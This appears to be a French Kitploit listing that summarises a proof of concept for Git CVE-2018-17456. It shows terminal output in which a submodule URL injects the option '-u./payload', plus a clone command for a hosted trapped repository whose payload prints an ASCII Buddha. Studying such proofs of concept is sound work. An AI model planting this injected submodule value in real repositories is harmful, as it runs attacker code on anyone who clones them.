Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-17456 — Reproduction de la vulnérabilité CVE-2018-17456 (PoC+Exp) | Kitploit
Outils/GitHubGitHub/anonymking/cve-2018-17456
Analyse des VulnérabilitésAnalyse de CodeExploitationSécurité de la Chaîne LogistiqueApprentissage et ÉducationExploitation de Binaires
GitHubanonymking/cve-2018-17456

CVE-2018-17456

Reproduction de la vulnérabilité CVE-2018-17456 (PoC+Exp)

Voir le dépôt
5il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-17456

Aperçu de la vulnérabilité

  • Nom de la vulnérabilité : Vulnérabilité d'erreur de validation d'entrée dans Git
  • Numéro CNNVD : CNNVD-201810-234
  • Niveau de danger : Très critique
  • Numéro CVE : CVE-2018-17456
  • Type de vulnérabilité : Erreur de validation d'entrée
  • Date de publication : 2018-10-08
  • Type de menace : Distante
  • Date de mise à jour : 2019-04-25
  • Éditeur : debian
  • Source de la vulnérabilité : Atlassian, TerryZh...
  • Description : Git est un système de contrôle de version distribué gratuit et open source. Une vulnérabilité d'erreur de validation d'entrée existe dans Git. Cette vulnérabilité provient du fait que le système ou le produit réseau ne valide pas correctement les données d'entrée. Les versions suivantes sont concernées : versions antérieures à Git 2.14.5, versions 2.15.x antérieures à 2.15.3, versions 2.16.x antérieures à 2.16.5, versions 2.17.x antérieures à 2.17.2, versions 2.18.x antérieures à 2.18.1, versions 2.19.x antérieures à 2.19.1.

Reproduction de la vulnérabilité

  • En raison du mécanisme de sécurité de Github, il n'est pas possible de télécharger un projet malveillant, vous pouvez donc exécuter le script build.sh pour construire localement ce projet à des fins d'apprentissage et de test.
  • La version de Git que j'utilise est git-2.12.1
  • Le processus et le résultat sont les suivants :
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • Le code malveillant que j'ai construit dans le payload affiche simplement un Bouddha, donc voir le Bouddha signifie que le test a réussi. En réalité, il s'affiche deux fois car une nouvelle tentative a lieu lors de l'échec du clonage du sous-projet.

Références

  • Projet poc-submodule

Découverte inattendue

  • J'ai réussi à construire ce projet sur Coding — CVE-2018-17456
  • Utilisation :
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • De plus, je recommande deux vulnérabilités similaires à étudier ensemble : CVE-2017-1000117, CVE-2018-11235
Télécharger l’outil